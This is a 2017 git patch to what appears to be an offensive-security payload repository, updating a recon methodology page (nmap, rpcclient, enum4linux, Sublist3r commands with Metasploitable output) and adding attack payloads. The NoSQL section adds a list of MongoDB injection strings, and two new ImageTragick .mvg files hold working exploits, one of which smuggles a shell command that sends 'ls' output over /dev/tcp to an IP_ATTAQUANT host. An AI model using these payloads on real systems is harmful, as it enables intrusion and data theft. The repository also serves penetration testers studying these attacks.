From e89e4fd312a2582c9c2cfc56942abe2c8078a9d5 Mon Sep 17 00:00:00 2001 From: Swissky Date: Wed, 17 May 2017 20:40:45 +0200 Subject: [PATCH] Methodology updated with RPCClient, User enumeration --- Methodology_and_enumeration.md | 153 +++++++++++++----- NoSQL injection/README.md | 25 ++- .../payload_remote_connection.mvg | 4 + .../payload_remote_exec_command.mvg | 4 + 4 files changed, 148 insertions(+), 38 deletions(-) create mode 100644 Upload insecure files/Image Tragik/payload_remote_connection.mvg create mode 100644 Upload insecure files/Image Tragik/payload_remote_exec_command.mvg diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md index 6c3c3c0..760a9cb 100644 --- a/Methodology_and_enumeration.md +++ b/Methodology_and_enumeration.md @@ -42,55 +42,120 @@ git clone https://github.com/ChrisTruncer/EyeWitness.git ``` ## Passive recon -``` -Using Shodan (https://www.shodan.io/) to detect similar app +* Using Shodan (https://www.shodan.io/) to detect similar app -Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints : -- look for JS files, old links +* Using The Wayback Machine (https://archive.org/web/) to detect forgotten endpoints, + ``` + look for JS files, old links + ``` -Using The Harvester (https://github.com/laramies/theHarvester) -python theHarvester.py -b all -d domain.com -``` +* Using The Harvester (https://github.com/laramies/theHarvester) + ``` + python theHarvester.py -b all -d domain.com + ``` ## Active recon -* Basic NMAP (if allowed ^^') -```bash -sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 -sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv +* Basic NMAP + ```bash + sudo nmap -sSV -p- 192.168.0.1 -oA OUTPUTFILE -T4 + sudo nmap -sSV -oA OUTPUTFILE -T4 -iL INPUTFILE.csv -• the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports -• the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000) -• 192.168.0.1 is the IP address to scan -• -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE" -• -iL INPUTFILE tells Nmap to use the provided file as inputs + • the flag -sSV defines the type of packet to send to the server and tells Nmap to try and determine any service on open ports + • the -p- tells Nmap to check all 65,535 ports (by default it will only check the most popular 1,000) + • 192.168.0.1 is the IP address to scan + • -oA OUTPUTFILE tells Nmap to output the findings in its three major formats at once using the filename "OUTPUTFILE" + • -iL INPUTFILE tells Nmap to use the provided file as inputs + ``` -nmap -A -T4 scanme.nmap.org -• -A: Enable OS detection, version detection, script scanning, and traceroute -• -T4: Defines the timing for the task (options are 0-5 and higher is faster) -``` +* Aggressive NMAP + ```bash + nmap -A -T4 scanme.nmap.org + • -A: Enable OS detection, version detection, script scanning, and traceroute + • -T4: Defines the timing for the task (options are 0-5 and higher is faster) + ``` + +* NMAP and add-ons + 1. Using searchsploit to detect vulnerable services + ```bash + nmap -p- -sV -oX a.xml IP_ADDRESS; searchsploit --nmap a.xml + ``` + 2. Generating nice scan report + ```bash + nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html" + ``` -* -```bash -nmap -p- -sV -oX a.xml host.domain.org -searchsploit --nmap a.xml -``` * NMAP Scripts -```bash -nmap -sC : equivalent to --script=default + ```bash + nmap -sC : equivalent to --script=default -nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap -PORT STATE SERVICE -80/tcp open http -| http-enum: -| /phpmyadmin/: phpMyAdmin -| /.git/HEAD: Git folder -| /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' -|_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' + nmap --script 'http-enum' -v web.xxxx.com -p80 -oN http-enum.nmap + PORT STATE SERVICE + 80/tcp open http + | http-enum: + | /phpmyadmin/: phpMyAdmin + | /.git/HEAD: Git folder + | /css/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' + |_ /image/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)' -List Nmap scripts : ls /usr/share/nmap/scripts/ -``` + nmap --script smb-enum-users.nse -p 445 [target host] + Host script results: + | smb-enum-users: + | METASPLOITABLE\backup (RID: 1068) + | Full name: backup + | Flags: Account disabled, Normal user account + | METASPLOITABLE\bin (RID: 1004) + | Full name: bin + | Flags: Account disabled, Normal user account + | METASPLOITABLE\msfadmin (RID: 3000) + | Full name: msfadmin,,, + | Flags: Normal user account + + List Nmap scripts : ls /usr/share/nmap/scripts/ + ``` + +* RPCClient + ```bash + ╰─$ rpcclient -U "" [target host] + rpcclient $> querydominfo + Domain: WORKGROUP + Server: METASPLOITABLE + Comment: metasploitable server (Samba 3.0.20-Debian) + Total Users: 35 + + rpcclient $> enumdomusers + user:[games] rid:[0x3f2] + user:[nobody] rid:[0x1f5] + user:[bind] rid:[0x4ba] + ``` +* Enum4all + ``` + Usage: ./enum4linux.pl [options]ip + -U get userlist + -M get machine list* + -S get sharelist + -P get password policy information + -G get group and member list + -d be detailed, applies to -U and -S + -u user specify username to use (default “”) + -p pass specify password to use (default “” + -a Do all simple enumeration (-U -S -G -P -r -o -n -i). + -o Get OS information + -i Get printer information + ============================== + | Users on XXX.XXX.XXX.XXX | + ============================== + index: 0x1 Account: games Name: games Desc: (null) + index: 0x2 Account: nobody Name: nobody Desc: (null) + index: 0x3 Account: bind Name: (null) Desc: (null) + index: 0x4 Account: proxy Name: proxy Desc: (null) + index: 0x5 Account: syslog Name: (null) Desc: (null) + index: 0x6 Account: user Name: just a user,111,, Desc: (null) + index: 0x7 Account: www-data Name: www-data Desc: (null) + index: 0x8 Account: root Name: root Desc: (null) + + ``` ## List all the subdirectories and files @@ -118,6 +183,20 @@ More subdomain : gobuster -w wordlist -u URL -r -e ``` +* Using Sublist3r +```bash +To enumerate subdomains of specific domain and show the results in realtime: +python sublist3r.py -v -d example.com + +To enumerate subdomains and enable the bruteforce module: +python sublist3r.py -b -d example.com + +To enumerate subdomains and use specific engines such Google, Yahoo and Virustotal engines +python sublist3r.py -e google,yahoo,virustotal -d example.com + +python sublist3r.py -b -d example.com +``` + * Using a script to detect all phpinfo.php files in a range of IPs (CIDR can be found with a whois) ```bash #!/bin/bash diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index 1b47522..d7e156a 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md @@ -24,6 +24,29 @@ username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=md.* ``` +## MongoDB Payloads +``` +true, $where: '1 == 1' +, $where: '1 == 1' +$where: '1 == 1' +', $where: '1 == 1' +1, $where: '1 == 1' +{ $ne: 1 } +', $or: [ {}, { 'a':'a +' } ], $comment:'successful MongoDB injection' +db.injection.insert({success:1}); +db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 +|| 1==1 +' && this.password.match(/.*/)//+%00 +' && this.passwordzz.match(/.*/)//+%00 +'%20%26%26%20this.password.match(/.*/)//+%00 +'%20%26%26%20this.passwordzz.match(/.*/)//+%00 +{$gt: ''} +[$ne]=1 +``` + + ## Thanks to * https://www.dailysecurity.fr/nosql-injections-classique-blind/ -* https://www.owasp.org/index.php/Testing_for_NoSQL_injection \ No newline at end of file +* https://www.owasp.org/index.php/Testing_for_NoSQL_injection +* https://github.com/cr0hn/nosqlinjection_wordlists diff --git a/Upload insecure files/Image Tragik/payload_remote_connection.mvg b/Upload insecure files/Image Tragik/payload_remote_connection.mvg new file mode 100644 index 0000000..bca419d --- /dev/null +++ b/Upload insecure files/Image Tragik/payload_remote_connection.mvg @@ -0,0 +1,4 @@ +push graphic-context +viewbox 0 0 640 480 +fill 'url(http://IP_ATTAQUANT/)' +pop graphic-context diff --git a/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg b/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg new file mode 100644 index 0000000..2664ca6 --- /dev/null +++ b/Upload insecure files/Image Tragik/payload_remote_exec_command.mvg @@ -0,0 +1,4 @@ +push graphic-context +viewbox 0 0 640 480 +fill 'url(https://IP_ATTAQUANT"||/bin/bash -c "ls > /dev/tcp/IP_ATTAQUANT/80)' +pop graphic-context